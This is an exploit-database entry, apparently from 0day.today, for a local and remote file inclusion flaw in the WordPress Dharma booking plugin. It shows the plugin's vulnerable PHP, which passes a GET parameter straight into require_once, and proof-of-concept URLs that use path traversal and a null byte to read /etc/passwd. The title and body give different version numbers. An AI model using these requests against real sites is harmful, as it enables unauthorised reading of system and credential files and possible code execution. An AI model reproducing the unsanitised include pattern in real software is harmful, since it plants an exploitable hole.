WordPress Dharma booking 2.38.3 Plugin - File Inclusion

2016-03-22T00:00:00
ID 1337DAY-ID-24975
Type zdt
Reporter AMAR^SHG
Modified 2016-03-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Wordpress Dharma booking File Inclusion
 
# Date: 03/22/2016
 
# Exploit Author: AMAR^SHG
 
# Vendor Homepage:https://wordpress.org/plugins/dharma-booking/
 
<https://webcache.googleusercontent.com/search?q=cache:1BjMckAC9HkJ:https://wordpress.org/plugins/dharma-booking/+&cd=2&hl=fr&ct=clnk&gl=fr>Software
Link : https://wordpress.org/plugins/dharma-booking/
 
# Version: <=2.28.3
 
# Tested on: WINDOWS/WAMP
 
 
dharma-booking/frontend/ajax/gateways/proccess.php's code:
<?php
include_once('../../../../../../wp-config.php');
$settings = get_option('Dharma_Vars');
echo $settings['paymentAccount']. $settings['gatewayid'];
require_once($_GET['gateway'].'.php');
//
POC:
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00

#  0day.today [2018-04-02]  #